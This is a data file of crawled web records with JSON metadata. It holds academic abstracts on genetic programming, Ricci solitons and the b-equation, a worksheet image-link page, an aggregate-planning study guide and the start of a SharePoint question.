{"ft_lang_label":"__label__en","ft_lang_prob":0.9598189,"math_prob":0.96091497,"size":1263,"snap":"2022-05-2022-21","text_gpt3_token_len":280,"char_repetition_ratio":0.12470215,"word_repetition_ratio":0.065727696,"special_character_ratio":0.23911323,"punctuation_ratio":0.10080645,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9916012,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-19T19:48:15Z\",\"WARC-Record-ID\":\"<urn:uuid:c1a4fb9f-18d5-4bb3-a0a1-4d427abb23ed>\",\"Content-Length\":\"229407\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:02f90aec-4790-4a1a-b207-fba61eb8d186>\",\"WARC-Concurrent-To\":\"<urn:uuid:f96615ad-2d5c-43ba-94d4-c36bf91d5e35>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/87234/aic-values-and-their-use-in-stepwise-model-selection-for-a-simple-linear-regress\",\"WARC-Payload-Digest\":\"sha1:WHZQGBAEPEA2AF5MY3EZ6BLAJP3RCNSM\",\"WARC-Block-Digest\":\"sha1:QIRHKFCEA5CQJUYMT4W5O4BOBG2YG2HN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662529658.48_warc_CC-MAIN-20220519172853-20220519202853-00245.warc.gz\"}"}
http://sjie.journals.sharif.edu/article_5392.html
[ "# Modeling of multi-response problems with non-deterministic, non-normal distributions using genetic programming

Article type: Research

Authors

Department of Industrial Engineering, Faculty of Engineering, Shahed University

Abstract

In the design and analysis of experiments, once the variables affecting the response variable have been determined, the goal is to discover the relationship between them and to provide a prediction model. In classical methods, certain assumptions for identifying the relationship between the response variables and the control variables must be checked and confirmed, yet in the real world the response variables often do not satisfy these conditions. Genetic programming (GP) is one of the newer methods for discovering the relationship between a set of variables; among its advantages is that it does not depend on the distribution of the residuals. Unlike the genetic algorithm, this method seeks to discover the relationship between the influential variables. In this study, genetic programming is proposed for discovering the relationship between the input variables of an experimental design with several response variables, and a genetic algorithm is then used for optimization.

Keywords

### MODELING OF MULTI-RESPONSE PROBLEMS WITH NON-DETERMINISTIC NON-NORMAL DISTRIBUTED RESPONSES USING GENETIC PROGRAMMING

Authors [English]

• M. Bashiri
• H. Hasanzadeh
Dept. of Industrial Engineering, Shahed University

Abstract [English]

In most experiments, the experimenter is interested in identifying effective controllable factors to model their relationship function. The classic approaches of response surface methodology and experimental design need to meet some requirements such as residual normality. However, in many real world applications, the assumptions may be violated. In such cases, data transformation methods can be an alternative. However, the mentioned method may increase total error in multiple response analyses. Genetic programming is a meta-heuristic approach in determination of effective controllable variables, and has been previously applied to many areas. One of the major differences between GP and the GA (Genetic Algorithm) is in the representation of the solution. In addition, GP is used to identify a suitable relationship function between variables, while the GA is used to optimize an objective function and find the near optimal values of decision variables. Therefore, each solution in GP represents one equation of the relationship function between variables. In this paper, genetic programming is applied for determination of the relation function between the response variables and controllable factors for non-deterministic, non-normal distributed responses. In other words, three steps are considered in the proposed method. In the first step, a relation function is estimated for each response according to the GP. Then, all estimated response functions are aggregated to a single response by the desirability function. In the last step, a GA is used for optimization of the extracted integrated function. Moreover, three examples are used to illustrate applications of the proposed method. In the first example, the efficiency of the proposed method in a single response problem is considered. The second example is used to compare the performance of the proposed method with the result of the regression method, while residuals have non-normal distribution. In the last example, the proposed method is applied to a multi-response problem in a real case study from the literature. Finally, the computational results of simulated data and previous studies confirm that the proposed method has a proper performance in determination of a suitable level of controllable factors.

Keywords [English]

• Design of experiments
• multi response variables
• non-deterministic residuals distribution
• genetic programming
• genetic algorithm" ]
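The aggregation step in the abstract (individual predicted responses combined through a desirability function before the GA runs) is easy to sketch. A minimal Python illustration in the Derringer-Suich style; the bounds, the larger-is-better targets, and the sample values are our own placeholders, not the paper's data:

```python
import math

def desirability_larger_is_better(y, lo, hi, weight=1.0):
    """Derringer-Suich 'larger is better' desirability, mapped to [0, 1]."""
    if y <= lo:
        return 0.0
    if y >= hi:
        return 1.0
    return ((y - lo) / (hi - lo)) ** weight

def overall_desirability(responses, bounds):
    """Geometric mean of the individual desirabilities (the GA's objective)."""
    ds = [desirability_larger_is_better(y, lo, hi)
          for y, (lo, hi) in zip(responses, bounds)]
    if min(ds) == 0.0:
        return 0.0
    return math.exp(sum(math.log(d) for d in ds) / len(ds))

# Two hypothetical responses, as predicted by GP-fitted models:
print(overall_desirability([7.2, 0.85], [(5.0, 10.0), (0.0, 1.0)]))
```

The geometric mean is the usual choice because a single completely undesirable response then drives the overall objective to zero.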
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9046408,"math_prob":0.98829854,"size":2449,"snap":"2022-05-2022-21","text_gpt3_token_len":520,"char_repetition_ratio":0.1382413,"word_repetition_ratio":0.011173184,"special_character_ratio":0.17558187,"punctuation_ratio":0.098522164,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9832222,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-24T02:15:15Z\",\"WARC-Record-ID\":\"<urn:uuid:ba4c9927-793e-4584-a898-f6abdb6fc773>\",\"Content-Length\":\"57520\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5ce8708f-c707-49a2-ae52-ccb76cd655f8>\",\"WARC-Concurrent-To\":\"<urn:uuid:dd45b48b-c0ba-4cb3-8724-0a145efedbc1>\",\"WARC-IP-Address\":\"81.31.168.62\",\"WARC-Target-URI\":\"http://sjie.journals.sharif.edu/article_5392.html\",\"WARC-Payload-Digest\":\"sha1:BNBSZJ7RRHVAYQYKBHJRPWXDFNNJQN3I\",\"WARC-Block-Digest\":\"sha1:X62H4PLBTHF4VC3IGN5BSUY5K5N2VSY3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662562410.53_warc_CC-MAIN-20220524014636-20220524044636-00157.warc.gz\"}"}
https://ckms.kms.or.kr/journal/view.html?doi=10.4134/CKMS.c200423
[ "Gradient Ricci solitons with half harmonic Weyl curvature and two Ricci eigenvalues

Commun. Korean Math. Soc. 2022 Vol. 37, No. 2, 585-594
https://doi.org/10.4134/CKMS.c200423
Published online March 29, 2022; printed April 30, 2022

Yutae Kang, Jongsu Kim (Sogang University)

Abstract : In this article we classify four dimensional gradient Ricci solitons $(M, g, f)$ with half harmonic Weyl curvature and at most two distinct Ricci-eigenvalues at each point. Indeed, we showed that, in a neighborhood $V$ of each point in some open dense subset of $M$, $(V, g)$ is isometric to one of the following: (i) an Einstein manifold. (ii) a domain in the Riemannian product $(\mathbb{R}^2, g_0) \times (N, \tilde{g})$, where $g_0$ is the flat metric on $\mathbb{R}^2$ and $(N, \tilde{g})$ is a two dimensional Riemannian manifold of constant curvature $\lambda \neq 0$. (iii) a domain in $\mathbb{R} \times W$ with the warped product metric $ds^2 + h(s)^2 \tilde{g}$, where $\tilde{g}$ is a constant curved metric on a three dimensional manifold $W$.

Keywords : Gradient Ricci soliton, half harmonic Weyl curvature

Supported by : This work was supported by the National Research Foundation of Korea (NRF) grant funded by the Korea government (MSIT) (No. 2020R1A2B5B01001862)." ]
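For context (our addition, not part of the journal page): the objects classified here satisfy the standard gradient Ricci soliton equation, with notation matching the abstract's $(M, g, f)$:

```latex
% Standard definition, added for context:
\mathrm{Ric}(g) + \nabla^2 f = \lambda\, g, \qquad \lambda \in \mathbb{R},
% called shrinking, steady, or expanding according to
% \lambda > 0, \ \lambda = 0, \ \lambda < 0.
```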
[ null, "https://ckms.kms.or.kr/img/quick_2019.gif", null, "https://ckms.kms.or.kr/img/leftmenu_about.gif", null, "https://ckms.kms.or.kr/img/leftmenu_eb.gif", null, "https://ckms.kms.or.kr/img/leftmenu_voj.gif", null, "https://ckms.kms.or.kr/img/leftmenu_fa.gif", null, "https://ckms.kms.or.kr/img/leftmenu_ees.gif", null, "https://ckms.kms.or.kr/img/leftmenu_cu.gif", null, "https://ckms.kms.or.kr/img/nsm_170411.jpg", null, "https://ckms.kms.or.kr/img/ba_hp02.gif", null, "https://www.inforang.com/img/banner/crossref-similarity-check-logo-200.png", null, "https://www.inforang.com/img/banner/iThenticate_166x60.gif", null, "https://www.inforang.com/img/banner/kofst_166x60.gif", null, "https://ckms.kms.or.kr/img/title05.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7816237,"math_prob":0.9170632,"size":847,"snap":"2022-27-2022-33","text_gpt3_token_len":259,"char_repetition_ratio":0.10083037,"word_repetition_ratio":0.0,"special_character_ratio":0.2927981,"punctuation_ratio":0.11515152,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9872334,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-26T19:46:54Z\",\"WARC-Record-ID\":\"<urn:uuid:20fd73cb-6c09-455f-a7ff-f960cf54ff3d>\",\"Content-Length\":\"19574\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:47f26e08-3be0-4fb3-a8e8-0b5d4963255e>\",\"WARC-Concurrent-To\":\"<urn:uuid:b25968c9-f6ec-43da-a179-a19aa529d395>\",\"WARC-IP-Address\":\"114.108.163.160\",\"WARC-Target-URI\":\"https://ckms.kms.or.kr/journal/view.html?doi=10.4134/CKMS.c200423\",\"WARC-Payload-Digest\":\"sha1:BQ7S6ZRJSY3M65BLQQ6CZAPTPE2FZRNK\",\"WARC-Block-Digest\":\"sha1:SRR2TBLQ4C2PBQWAKS4LESX3HREI7YDC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103271864.14_warc_CC-MAIN-20220626192142-20220626222142-00756.warc.gz\"}"}
http://fronteirastral.com/area-of-compound-shapes-worksheet/
[ "# Area Of Compound Shapes Worksheet

309 best Area and Perimeter images on Pinterest from Area Of Compound Shapes Worksheet
, source: pinterest.com", null, "Draw the other half of each shape Geometry Worksheets from Area Of Compound Shapes Worksheet
, source: pinterest.com", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet
, source: homeschooldressage.com", null, "area and perimeter of pound shapes a pound 00 Criabooks from Area Of Compound Shapes Worksheet
, source: criabooks.com", null, "area and perimeter of pound shapes a pound 00 Criabooks from Area Of Compound Shapes Worksheet
, source: criabooks.com", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet
, source: homeschooldressage.com", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet
, source: homeschooldressage.com", null, "pound shapes area worksheet free worksheets library math from Area Of Compound Shapes Worksheet
, source: criabooks.com", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet
, source: homeschooldressage.com", null, "volume of irregular shapes worksheets free library calculate the from Area Of Compound Shapes Worksheet
, source: criabooks.com", null, "Finding the perimeter of rectangles and pound shapes by from Area Of Compound Shapes Worksheet
, source: tes.com", null, "Worksheet pound Shapes Area And Perimeter ora exacta from Area Of Compound Shapes Worksheet
, source: ora-exacta.co", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet
, source: homeschooldressage.com", null, "Find the Area pound Shapes from Area Of Compound Shapes Worksheet
, source: pinterest.com", null, "Area Worksheet Counting Squares l x Pinterest from Area Of Compound Shapes Worksheet
, source: pinterest.com", null, "Worksheets 45 Unique Area posite Figures Worksheet Hi Res from Area Of Compound Shapes Worksheet
, source: latinopoetryreview.com", null, "Area and Perimeter of posite Shapes from Area Of Compound Shapes Worksheet
, source: ck12.org", null, "Worksheets 45 Unique Area posite Figures Worksheet Hi Res from Area Of Compound Shapes Worksheet
, source: latinopoetryreview.com", null, "pound shapes area worksheet free worksheets library math from Area Of Compound Shapes Worksheet
, source: criabooks.com", null, "Worksheets 45 Unique Area posite Figures Worksheet Hi Res from Area Of Compound Shapes Worksheet
, source: latinopoetryreview.com", null, "Area and Perimeter of posite Shapes Read Geometry from Area Of Compound Shapes Worksheet
, source: ck12.org", null, "Area of posite Figures Game Geometry Escape Room Math by from Area Of Compound Shapes Worksheet
, source: teacherspayteachers.com", null, "910 best geometria images on Pinterest from Area Of Compound Shapes Worksheet
, source: pinterest.co.uk", null, "125 best Szögek images on Pinterest from Area Of Compound Shapes Worksheet
, source: pinterest.com", null, "Worksheets 45 Unique Area posite Figures Worksheet Hi Res from Area Of Compound Shapes Worksheet
, source: latinopoetryreview.com", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet", null, "area and perimeter of pound shapes a pound 00 Criabooks from Area Of Compound Shapes Worksheet
, source: criabooks.com", null, "Area and Perimeter of posite Shapes Read Geometry from Area Of Compound Shapes Worksheet
, source: ck12.org",
null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet", null, "Measurement Measure and calculate the perimeter of from Area Of Compound Shapes Worksheet\n, source: twinkl.co.uk", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet", null, "volume of irregular shapes worksheets free library calculate the from Area Of Compound Shapes Worksheet\n, source: criabooks.com", null, "Area and Perimeter of posite Shapes Read Geometry from Area Of Compound Shapes Worksheet\n, source: ck12.org", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet" ]
[ null, "http://winonarasheed.com/wp-content/uploads/draw-the-other-half-of-each-shape-geometry-worksheets-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-shapes-worksheet-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-pound-shapes-a-pound-00-criabooks-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-pound-shapes-a-pound-00-criabooks-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-shapes-worksheet-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-pound-shapes-area-and-perimeter-ora-exacta-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/pound-shapes-area-worksheet-free-worksheets-library-math-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-shapes-worksheet-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-2.jpg", null, "http://winonarasheed.com/wp-content/uploads/volume-of-irregular-shapes-worksheets-free-library-calculate-the-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/finding-the-perimeter-of-rectangles-and-pound-shapes-by-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-pound-shapes-area-and-perimeter-ora-exacta-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-shapes-worksheet-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-3.jpg", null, "http://winonarasheed.com/wp-content/uploads/find-the-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-worksheet-counting-squares-l-x-pinterest-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheets-45-unique-area-posite-figures-worksheet-hi-res-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-posite-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheets-45-unique-area-posite-figures-worksheet-hi-res-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/pound-shapes-area-worksheet-free-worksheets-library-math-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheets-45-unique-area-posite-figures-worksheet-hi-res-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-2.jpg", 
null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-posite-shapes-read-geometry-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-of-posite-figures-game-geometry-escape-room-math-by-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/910-best-geometria-images-on-pinterest-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/125-best-szagek-images-on-pinterest-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheets-45-unique-area-posite-figures-worksheet-hi-res-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-3.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-pound-shapes-a-pound-00-criabooks-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-posite-shapes-read-geometry-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/measurement-measure-and-calculate-the-perimeter-of-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-2.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-3.jpg", null, "http://winonarasheed.com/wp-content/uploads/volume-of-irregular-shapes-worksheets-free-library-calculate-the-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-1.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-posite-shapes-read-geometry-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-2.jpg", null, "http://winonarasheed.com/wp-content/uploads/worksheet-area-pound-shapes-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet-4.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8124806,"math_prob":0.59194624,"size":3976,"snap":"2020-45-2020-50","text_gpt3_token_len":835,"char_repetition_ratio":0.32779455,"word_repetition_ratio":0.67826086,"special_character_ratio":0.18158954,"punctuation_ratio":0.16138329,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9713893,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68],"im_url_duplicate_count":[null,1,null,1,null,2,null,2,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-27T20:17:25Z\",\"WARC-Record-ID\":\"<urn:uuid:54464833-483f-4114-9b95-47ffad4f043f>\",\"Content-Length\":\"67995\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ad1bc0dd-1bf6-4990-9886-5943791fb033>\",\"WARC-Concurrent-To\":\"<urn:uuid:569bf0f1-436c-430e-a13c-95ffc2339dae>\",\"WARC-IP-Address\":\"104.24.102.9\",\"WARC-Target-URI\":\"http://fronteirastral.com/area-of-compound-shapes-worksheet/\",\"WARC-Payload-Digest\":\"sha1:5XVTV676UNOAV2BCAAAFIXGLCFGGAKHU\",\"WARC-Block-Digest\":\"sha1:2NEBI7EL4DVBD2XINBW4PGJ2XXWA7ROL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107894759.37_warc_CC-MAIN-20201027195832-20201027225832-00299.warc.gz\"}"}
https://www.intlpress.com/site/pub/pages/journals/items/maa/content/vols/0023/0002/a001/index.html
[ "# Methods and Applications of Analysis\n\n## Volume 23 (2016)\n\n### Error estimate of the particle method for the $b$-equation\n\nPages: 119 – 154\n\nDOI: http://dx.doi.org/10.4310/MAA.2016.v23.n2.a1\n\n#### Authors\n\nYong Duan (School of Mathematical Sciences, University of Electronic Science and Technology of China, Chengdu, Sichuan, China)\n\nJian-Guo Liu (Department of Physics and Department of Mathematics, Duke University, Durham, North Carolina, U.S.A.)\n\n#### Abstract\n\nIn this paper, we establish the optimal error estimate of the particle method for a family of nonlinear evolutionary partial differential equations, or the so-called $b$-equation. The $b$-equation, including the Camassa–Holm equation and the Degasperis–Procesi equation, has many applications in diverse scientific fields. The particle method is an approximation of the $b$-equation in Lagrangian representation. We also prove short-time existence, uniqueness and regularity of the Lagrangian representation of the $b$-equation.\n\n#### Keywords\n\nCamassa–Holm equation, Degasperis–Procesi equation, Lagrangian representation, classical solution, particle method, peakon solutions, error estimate\n\n#### 2010 Mathematics Subject Classification\n\n35B65, 35C08, 35D35, 65M15, 65M75\n\nFull Text (PDF format)\n\nPublished 30 June 2016" ]
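For reference (our addition, not quoted from the paper), the b-family of equations referred to in the abstract is usually written as:

```latex
% The b-family in its common form; m is the momentum variable:
m_t + u\, m_x + b\, u_x\, m = 0, \qquad m = u - u_{xx},
% with b = 2 the Camassa--Holm equation and
% b = 3 the Degasperis--Procesi equation.
```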
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7730839,"math_prob":0.62610686,"size":1005,"snap":"2019-13-2019-22","text_gpt3_token_len":264,"char_repetition_ratio":0.15684316,"word_repetition_ratio":0.032520324,"special_character_ratio":0.23880596,"punctuation_ratio":0.16477273,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98562217,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-24T13:35:34Z\",\"WARC-Record-ID\":\"<urn:uuid:8d9ba3a8-db9c-4fa4-bc76-41c613ec6a2f>\",\"Content-Length\":\"8948\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e31a43a4-8b89-4b82-aa73-f48807b1020e>\",\"WARC-Concurrent-To\":\"<urn:uuid:ad99db0f-7e84-40c7-a4e8-f2d109da8128>\",\"WARC-IP-Address\":\"107.180.41.239\",\"WARC-Target-URI\":\"https://www.intlpress.com/site/pub/pages/journals/items/maa/content/vols/0023/0002/a001/index.html\",\"WARC-Payload-Digest\":\"sha1:E2CIYYBAGZHNBBGB7ABJNEJN664BTFG4\",\"WARC-Block-Digest\":\"sha1:UMQPOKI3HLQYAOQYOFEPPNPSX2MEUFEA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912203448.17_warc_CC-MAIN-20190324124545-20190324150545-00202.warc.gz\"}"}
https://www.coursehero.com/file/106656591/MOS-3330-Test-2-Caculation-Reviewpdf/
[ "# MOS 3330 Test 2 Caculation Review.pdf - MOS 3330 Test 2 Calculation Review

Western University, DAN Management, MOS 3330

General Tips

Recommended steps for how to prepare for calculation questions in Test 2:

1. Review computational examples in the lecture slides. Familiarize yourself with typical input data for an aggregate plan. Familiarize yourself with the format of the aggregate plan table as shown in the lecture slides (you don't have to memorize the column headings because they will be provided in the test). Understand how to calculate columns of the aggregate plan table and the total cost. Understand the aggregate plan examples shown in the lecture slides (Examples 1a to 1d and 2a to 2d). Understand the differences among level, chase, and hybrid approaches; for Test 2, you have to determine which one to use based on the description of the plan given in the test question.

2. Download the formula sheet from the course web site. Test 2 covers the middle one-third of the formula sheet. Recall that symbols are not defined on the formula sheet; you should know what they stand for.

3. Study end-of-chapter problems in the textbook. The textbook questions may be confusing because they sometimes refer to hybrid cases as “level” or “chase”; also, their solutions sometimes include additional improvement, which was not specified in the question. If you get stuck with a textbook question, check the solution right away and learn from it. You don't have to do all problems in the textbook; see below for suggested problems.

Rounding Reminder

1. For a physical quantity (e.g., order quantity), the final answer should be an integer.
2. For a dollar amount, the final answer should have two decimal points.

Textbook Suggested Problems
Aggregate Planning (Chapter 13)

For problems 1 to 7, some of the costs are provided per hour instead of per unit (the lecture slides typically provided costs per unit). All you have to do is to convert the cost per hour to the cost per unit once at the beginning, and you don't have to worry about conversion after that. For problems 1 to 7, the conversion has been done for you below:

Convert cost per hour to cost per unit: (regular-time labor cost per hour) × (labor standard per unit) = (regular-time labor cost per unit) = 12 × 6 = $72. This is the cost of regular production. (Overtime labor cost per hour) × (labor standard per unit) = (overtime labor cost per unit) = 16 × 6 = $96. This is the cost of overtime production.

Convert “time available” to “production rate”: (regular time available per period) / (labor standard per unit) = 160/6 = 26.67. This is the regular production rate per worker per period. Convert “overtime available per period” to “production rate” = (overtime available per period) / (labor standard per unit) = 30/6 = 5. This is the overtime rate per worker per period. It works the same way as the regular production rate." ]
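The conversions above reduce to four lines of arithmetic; a sketch (ours, not Course Hero material) using the same worked numbers:

```python
# Unit conversions from the review notes; inputs match the worked numbers.
regular_wage_per_hour = 12.0     # $/hour
overtime_wage_per_hour = 16.0    # $/hour
labor_standard = 6.0             # hours of labor per unit
regular_hours_per_period = 160.0
overtime_hours_per_period = 30.0

regular_cost_per_unit = regular_wage_per_hour * labor_standard    # $72
overtime_cost_per_unit = overtime_wage_per_hour * labor_standard  # $96
regular_rate = regular_hours_per_period / labor_standard          # 26.67 units/worker/period
overtime_rate = overtime_hours_per_period / labor_standard        # 5 units/worker/period

print(regular_cost_per_unit, overtime_cost_per_unit,
      round(regular_rate, 2), overtime_rate)
```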
[ null, "https://assets.coursehero.com/ssi/27b7037f838acd0278f7.svg", null, "https://www.coursehero.com/assets/img/doc-landing/start-quote.svg", null, "https://www.coursehero.com/assets/img/doc-landing/start-quote.svg", null, "https://www.coursehero.com/assets/img/doc-landing/start-quote.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8298737,"math_prob":0.75808305,"size":3205,"snap":"2023-14-2023-23","text_gpt3_token_len":747,"char_repetition_ratio":0.10809122,"word_repetition_ratio":0.0781893,"special_character_ratio":0.2146646,"punctuation_ratio":0.09948542,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9711209,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-27T00:34:26Z\",\"WARC-Record-ID\":\"<urn:uuid:7680b878-0077-41a7-a418-a1f3eef294a9>\",\"Content-Length\":\"515771\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:626182c5-beaa-4cea-8437-88e1cdff1f3a>\",\"WARC-Concurrent-To\":\"<urn:uuid:f4794f81-f41d-422b-a418-9f337c267e16>\",\"WARC-IP-Address\":\"104.17.92.47\",\"WARC-Target-URI\":\"https://www.coursehero.com/file/106656591/MOS-3330-Test-2-Caculation-Reviewpdf/\",\"WARC-Payload-Digest\":\"sha1:F3AKRUYSJN3YP2RIZF46AIZFD7VOSPX5\",\"WARC-Block-Digest\":\"sha1:MKFSSQAEV4X3234YTNUNNTXFDRPXCQUM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296946584.94_warc_CC-MAIN-20230326235016-20230327025016-00018.warc.gz\"}"}
https://sharepoint.stackexchange.com/questions/215642/numeric-field-of-type-calculated-column-will-show-extra-decimal-places-with-valu
[ "# Numeric field of type Calculated column will show extra decimal places with values of 99999

I am working on a SharePoint Server 2016, and I have a custom list with the following fields:-", null, "I am showing a sample of test data with test column names, as this info is somewhat confidential.

